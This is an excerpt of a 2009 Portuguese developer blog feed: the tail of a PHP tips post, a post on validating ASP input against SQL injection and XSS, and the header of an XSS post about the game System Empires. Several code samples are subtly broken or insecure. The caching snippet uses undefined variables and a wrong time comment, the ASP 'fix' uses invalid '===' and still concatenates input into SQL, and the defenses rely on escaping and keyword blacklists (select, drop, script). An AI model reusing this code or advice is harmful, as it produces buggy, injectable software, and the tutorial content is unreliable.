<span style="color: #b1b100;">return</span> <span style="color: #009900;">&#40;</span>bool<span style="color: #009900;">&#41;</span><span style="color: #990000;">preg_match</span><span style="color: #009900;">&#40;</span> <span style="color: #0000ff;">'/^[0-9]+$/'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>is_natural<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'id'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #666666; font-style: italic;">/* código */</span> <span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">else</span> <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'Erro'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Outro exemplo também com URL: joaopedropereira.com/xpto.php?email=email@domain.tld</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> is_email<span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
<span style="color: #b1b100;">return</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">preg_match</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/^([a-z0-9\+_\-]+)(\.[a-z0-9\+_\-]+)*@([a-z0-9\-]+\.)+[a-z]{2,6}$/ix&quot;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> ? <span style="color: #009900; font-weight: bold;">TRUE</span> <span style="color: #339933;">:</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>is_email<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'email'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #666666; font-style: italic;">/* código */</span> <span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">else</span> <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'Erro'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Também com formulários se deve proceder de uma forma semelhante a esta.</p>
<p>ID Cliente<br />
<input name="id" type="text" />
<p>Email<br />
<input name="email" type="text" /></p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> is_natural<span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
<span style="color: #b1b100;">return</span> <span style="color: #009900;">&#40;</span>bool<span style="color: #009900;">&#41;</span><span style="color: #990000;">preg_match</span><span style="color: #009900;">&#40;</span> <span style="color: #0000ff;">'/^[0-9]+$/'</span><span style="color: #339933;">,</span> <span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #000000; font-weight: bold;">function</span> is_email<span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
<span style="color: #b1b100;">return</span> <span style="color: #009900;">&#40;</span><span style="color: #990000;">preg_match</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;/^([a-z0-9\+_\-]+)(\.[a-z0-9\+_\-]+)*@([a-z0-9\-]+\.)+[a-z]{2,6}$/ix&quot;</span><span style="color: #339933;">,</span> <span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> ? <span style="color: #009900; font-weight: bold;">TRUE</span> <span style="color: #339933;">:</span> <span style="color: #009900; font-weight: bold;">FALSE</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>is_email<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'email'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> AND is_natural<span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'id'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #666666; font-style: italic;">/* código */</span> <span style="color: #009900;">&#125;</span>
<span style="color: #b1b100;">else</span> <span style="color: #990000;">die</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'Erro'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>Vimos então que se podem validar os dados através de Regex mas existem outras formas de o fazer.</p>
<p>Imaginemos que temos um formulário que envia um campo de texto. Não podemos criar uma função em Regex para o efeito, assim temos de utilizar outras funções mais ou menos complexas para fazer a limpeza destes dados (recomendo o estudo das funções de validação da Kohana ou CodeIgniter).</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$str</span> <span style="color: #339933;">=</span> <span style="color: #990000;">strip_tags</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$str</span> <span style="color: #339933;">=</span> <span style="color: #990000;">mysql_real_escape_string</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #b1b100;">return</span> <span style="color: #000088;">$str</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>Com esta função adicionamos alguma segurança ao nosso código limpando tags como as utilizadas em ataques XSS e limpamos os dados contra SQL Injection. (Atenção: esta função não inibe todos os ataques apenas os dificulta um pouco).</p>
<p>Existe também uma forma de melhorar a segurança que dá menos trabalho pois apenas com algumas linhas de código podemos limpar todos os dados passados por $_POST, $_GET, $_REQUEST, $_COOKIE, $_SESSION, etc.</p>
<p>Eu normalmente crio um ficheiro que incluo no inicio de cada página parecido com o seguinte:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_POST</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$key</span> <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$_POST</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$key</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_GET</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$key</span> <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$_GET</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$key</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_REQUEST</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$key</span> <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$_REQUEST</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$key</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$key</span> <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$key</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$_SESSION</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$key</span> <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #000088;">$_SESSION</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$key</span><span style="color: #009900;">&#93;</span> <span style="color: #339933;">=</span> proteger<span style="color: #009900;">&#40;</span><span style="color: #000088;">$value</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<h2>Ambiente de Teste vs. Ambiente Real</h2>
<p>Um dos problemas com que me deparava quando me iniciei no desenvolvimento de aplicações web em PHP (como o tempo passa&#8230;) era a mudança de variáveis entre o ambiente de teste e o real, como por exemplo as configurações da base de dados&#8230;</p>
<p>Até ter adoptado uma metodologia que me permitia ao alterar apenas uma linha alternar entre os ambientes.</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'LIVE'</span><span style="color: #339933;">,</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span>LIVE<span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #990000;">error_reporting</span><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">0</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_HOST'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'localhost'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_USER'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'root'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_PASSWORD'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">''</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_DATABASE'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'basededadosxpto'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span>
<span style="color: #990000;">error_reporting</span><span style="color: #009900;">&#40;</span><span style="color: #009900; font-weight: bold;">E_ALL</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_HOST'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'joaopedropereira.com'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_USER'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'joao'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_PASSWORD'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'pedro'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">define</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">'DB_DATABASE'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'joao_basededados'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>Com esta metodologia só preciso de modificar a linha que define a constante LIVE como true ou false conforme esteja a trabalhar num ou noutro ambiente, podem também verificar ali a alteração do <a title="error_reporting" href="http://www.php.net/manual/pt_BR/function.error-reporting.php" target="_blank">error_reporting</a>, enquanto no caso do Ambiente Real não quero que sejam mostrados nenhuns erros aos visitantes por questões quer de segurança quer de aspecto, no caso do Ambiente de Teste quero saber todos os pormenores.</p>
<h2>Utilizar Output Buffering</h2>
<p>Utilizar Output Buffering é uma excelente maneira de optimizar a performance de uma aplicação em PHP. Sem Output Buffering a sua aplicação só vai mostrar o HTML no fim de toda a página estar carregada, com o Output Buffering a sua aplicação mostra o HTML já carregado quando o programador ordena!</p>
<p>O Developer Brian Cray criou um artigo muito interessante sobre este assunto para a DevTips. <a title="Output Buffering for Web Developers, a Beginner’s Guide" href="http://dev-tips.com/featured/output-buffering-for-web-developers-a-beginners-guide" target="_blank">Veja-o aqui</a>.</p>
<h2>Utilizar Sistemas de Caching</h2>
<p>Os Sistemas de Caching são interessantes para aumentar a performance de uma aplicação em PHP. No entanto há que ter em atenção alguns aspectos como por exemplo numa amostragem de resultados em tempo real não se podem utilizar sistemas de caching ou então teremos dados desactualizados&#8230;</p>
<p>Existem sistemas prontos a usar mas também podemos desenvolver o nosso sistema de caching como por exemplo algo do género:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000088;">$cache_file</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">'cache_files/'</span> <span style="color: #339933;">.</span> <span style="color: #990000;">md5</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_SERVER</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'SCRIPT_URI'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000088;">$cache_time</span> <span style="color: #339933;">=</span> <span style="color: #cc66cc;">1200</span> <span style="color: #339933;">*</span> <span style="color: #cc66cc;">60</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//60min*6 * 60 segundos (6HORAS)</span>
&nbsp;
<span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #990000;">file_exists</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cache_file</span><span style="color: #009900;">&#41;</span> AND <span style="color: #990000;">is_readable</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cache_file</span><span style="color: #009900;">&#41;</span> AND <span style="color: #009900;">&#40;</span><span style="color: #990000;">time</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">-</span> <span style="color: #000088;">$cachetime</span> <span style="color: #339933;">&lt;</span> <span style="color: #990000;">filemtime</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cache_file</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
<span style="color: #b1b100;">require_once</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cache_file</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span> <span style="color: #b1b100;">else</span> <span style="color: #009900;">&#123;</span>
<span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #666666; font-style: italic;">/* o código do ficheiro */</span>
&nbsp;
<span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #990000;">fopen</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cachefile</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'w'</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">fwrite</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #339933;">,</span> <span style="color: #990000;">ob_get_contents</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #990000;">fclose</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #990000;">ob_end_flush</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>Sistemas de Caching:</p>
<ul>
<li><a title="Memcached" href="http://www.danga.com/memcached/" target="_blank">Memcached</a></li>
<li><a title="APC" href="http://us.php.net/manual/pt_BR/intro.apc.php" target="_blank">APC</a></li>
<li><a title="XCache" href="http://xcache.lighttpd.net/" target="_blank">XCache</a></li>
</ul>
<h2>Eu não mordo&#8230;</h2>
<p>Não tenha medo de comentar, não tenha medo de perguntar, de criticar ou elogiar! Qualquer dúvida pergunte, qualquer reparo faça-o, todas as opiniões e comentários são bem vindos aqui no blog.</p>
<p>Pode também divulgar o artigo, eu não acuso ninguém que divulgue o meu artigo nas diversas redes sociais ou nos próprios blogs (mencionando a fonte ou autor) de plágio <img src='http://joaopedropereira.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<ul></ul>
</pre>
<div class="shr-publisher-456"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F08%2F15%2Fphp-developer-caminho%2F' data-shr_title='O+WebDeveloper+que+Utiliza+PHP+%3A%3A+Caminho'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F08%2F15%2Fphp-developer-caminho%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F08%2F15%2Fphp-developer-caminho%2F' data-shr_title='O+WebDeveloper+que+Utiliza+PHP+%3A%3A+Caminho'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2009/08/15/php-developer-caminho/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Validar Dados em ASP</title>
		<link>http://joaopedropereira.com/blog/2009/07/27/validar-dados-asp/</link>
		<comments>http://joaopedropereira.com/blog/2009/07/27/validar-dados-asp/#comments</comments>
		<pubDate>Mon, 27 Jul 2009 22:24:32 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[ASP]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=412</guid>
		<description><![CDATA[O que vos venho mostrar hoje é como dificultar o trabalho a pessoas que queiram explorar vulnerabilidades no vosso sistema programado em ASP. Esta semana tive um trabalho em mãos que consistia em resolver um problema num site Inglês programado em ASP pois este andava a ser atacado por hackers através de SQL Injection e [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F07%2F27%2Fvalidar-dados-asp%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F07%2F27%2Fvalidar-dados-asp%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>O que vos venho mostrar hoje é como dificultar o trabalho a pessoas que queiram explorar vulnerabilidades no vosso sistema programado em ASP.  Esta semana tive um trabalho em mãos que consistia em resolver um problema num site Inglês programado em ASP pois este andava a ser atacado por hackers através de SQL Injection e através desta técnica também criavam ataques de XSS.  Não precisei de muito tempo até identificar um possível buraco que pudesse ser explorado.  Depois de alguns testes lá consegui obter informações sobre a base de dados desse site mas também sobre outras bases de dados existentes no mesmo servidor o que mostra não só a falta de cuidado do programador mas também do alojamento, mas como o segundo caso não me dizia respeito tratei de corrigir o primeiro.</p>
<h2>Como Validar Dados Em ASP</h2>
<p>Existem várias maneiras de validar dados quando estamos a desenvolver aplicações em ASP.</p>
<h3>Função: IsNumeric()</h3>
<p>A maior parte dos dados passados através de parâmetros nos URL são valores numéricos correspondentes a ID&#8217;s, assim a função que a linguagem ASP traz por defeito (built-in) IsNumeric() chega para verificar se os valores dos parâmetros passados correspondem a um número.  Foi isto que utilizei para o caso em especifico.  O programador tinha feito algo como:</p>

<div class="wp_syntax"><div class="code"><pre class="asp" style="font-family:monospace;">GetNews <span style="color: #006600; font-weight: bold;">=</span> <span style="color: #cc0000;">&quot;SELECT NewsID, campox, campoy, Imagem1, Imagem2, Artigo FROM empresa_News WHERE NewsID = '&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>amp<span style="color: #006600; font-weight: bold;">;</span>request<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;id&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span>amp<span style="color: #006600; font-weight: bold;">;</span><span style="color: #cc0000;">&quot;' &quot;</span>
<span style="color: #990099; font-weight: bold;">Set</span> RSNews <span style="color: #006600; font-weight: bold;">=</span> MyConn.<span style="color: #330066;">execute</span><span style="color: #006600; font-weight:bold;">&#40;</span>GetNews<span style="color: #006600; font-weight:bold;">&#41;</span></pre></div></div>

<p>E isto passava o valor do id sem qualquer tipo de validação.  Passando agora a algo como</p>

<div class="wp_syntax"><div class="code"><pre class="asp" style="font-family:monospace;"><span style="color: #990099; font-weight: bold;">if</span> IsNumeric<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #990099; font-weight: bold;">request</span><span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;id&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight:bold;">&#41;</span> <span style="color: #006600; font-weight: bold;">===</span> <span style="color: #0000ff; font-weight: bold;">TRUE</span> <span style="color: #990099; font-weight: bold;">then</span>
GetNews <span style="color: #006600; font-weight: bold;">=</span> <span style="color: #cc0000;">&quot;SELECT NewsID, campox, campoy, Imagem1, Imagem2, Artigo FROM empresa_News WHERE NewsID = '&quot;</span><span style="color: #006600; font-weight: bold;">&amp;</span>amp<span style="color: #006600; font-weight: bold;">;</span>request<span style="color: #006600; font-weight:bold;">&#40;</span><span style="color: #cc0000;">&quot;id&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span><span style="color: #006600; font-weight: bold;">&amp;</span>amp<span style="color: #006600; font-weight: bold;">;</span><span style="color: #cc0000;">&quot;' &quot;</span>
<span style="color: #990099; font-weight: bold;">Set</span> RSNews <span style="color: #006600; font-weight: bold;">=</span> MyConn.<span style="color: #330066;">execute</span><span style="color: #006600; font-weight:bold;">&#40;</span>GetNews<span style="color: #006600; font-weight:bold;">&#41;</span></pre></div></div>

<p>Mas podiam ter sido utilizadas outras técnicas caso não se tratasse de um valor numérico.</p>
<h3>Escape dos Dados</h3>

<div class="wp_syntax"><div class="code"><pre class="asp" style="font-family:monospace;"><span style="color: #0000ff; font-weight: bold;">function</span> stripQuotes<span style="color: #006600; font-weight:bold;">&#40;</span>str<span style="color: #006600; font-weight:bold;">&#41;</span>
stripQuotes <span style="color: #006600; font-weight: bold;">=</span> <span style="color: #330066;">replace</span><span style="color: #006600; font-weight:bold;">&#40;</span>str, <span style="color: #cc0000;">&quot;'&quot;</span>, <span style="color: #cc0000;">&quot;&quot;</span><span style="color: #006600; font-weight:bold;">&#41;</span>
<span style="color: #990099; font-weight: bold;">end</span> <span style="color: #0000ff; font-weight: bold;">function</span></pre></div></div>

<p>Esta função vai fazer com que todos os caracteres &#8216; desapareçam, pode-se adaptar esta função para outros caracteres, o que é algo que aconselho vivamente a fazerem, bem como a palavras como script, xp_, select, drop, update, where, entre outras.</p>
<h2>Desafio</h2>
<p>Desafio todos os leitores a criarem uma função em ASP para fazer uma validação e tratamento dos dados protegendo as páginas de SQL Injection e de ataques XSS. Para isso só precisam de deixar a vossa função nos comentários.</p>
<p>A melhor função será publicada num post com uma menção para o seu autor.</p>
<p><strong><span style="text-decoration: underline;">Show some love, divulguem e participem <img src='http://joaopedropereira.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </span></strong></p>
<div class="shr-publisher-412"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F07%2F27%2Fvalidar-dados-asp%2F' data-shr_title='Validar+Dados+em+ASP'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F07%2F27%2Fvalidar-dados-asp%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F07%2F27%2Fvalidar-dados-asp%2F' data-shr_title='Validar+Dados+em+ASP'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2009/07/27/validar-dados-asp/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidade XSS no jogo System Empires</title>
		<link>http://joaopedropereira.com/blog/2009/05/01/vulnerabilidade-xss-system-empires/</link>
		<comments>http://joaopedropereira.com/blog/2009/05/01/vulnerabilidade-xss-system-empires/#comments</comments>
		<pubDate>Fri, 01 May 2009 19:45:29 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Segurança]]></category>
		<category><![CDATA[sysemp]]></category>
		<category><![CDATA[system empires]]></category>
		<category><![CDATA[vuln]]></category>
		<category><![CDATA[vulnerabilidade]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=306</guid>
		<description><![CDATA[Hoje venho mostrar-vos como é fácil encontrar vulnerabilidades em páginas web, para inaugurar esta nova &#8220;categoria&#8221; do blog o website escolhido foi o jogo web-based System Empires jogo este que tenho vindo a jogar e a falha nele explorada será o tipo de falha Cross-site scripting (XSS) esta falha, para os que não sabem, permite [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F05%2F01%2Fvulnerabilidade-xss-system-empires%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F05%2F01%2Fvulnerabilidade-xss-system-empires%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
